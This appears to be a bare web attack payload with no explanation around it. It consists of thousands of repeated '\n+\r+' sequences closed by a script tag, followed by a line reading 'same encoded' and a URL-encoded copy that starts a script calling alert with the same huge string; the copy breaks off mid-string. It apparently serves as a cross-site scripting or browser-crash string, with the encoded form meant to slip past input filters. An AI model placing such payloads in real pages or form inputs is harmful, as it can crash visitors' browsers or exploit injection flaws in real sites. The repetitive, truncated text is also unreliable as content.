\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r/); </script>
... same encoded =>
<script language=JavaScript>m='%3Cscript%3Ealert%28/%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+
%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+
%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5C
n+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5C
n+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%
5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%
5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%
5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5C
n+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn
+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn
+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+
%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+
%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+
%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+
%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+
%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%
5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%
5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+
%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5C
n+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5
Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn
+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+
%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+
%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%
5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+
%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+
%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn
+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+
%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5
Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5C
r+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%
5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn
+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%
5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+
%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn
+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%
5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+
%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5
Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5
Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5
Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+
%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+
%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr+%5Cn+%5Cr+%5Cn+
%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%0A%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%0A%5Cr
+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5Cn+%5Cr+%5
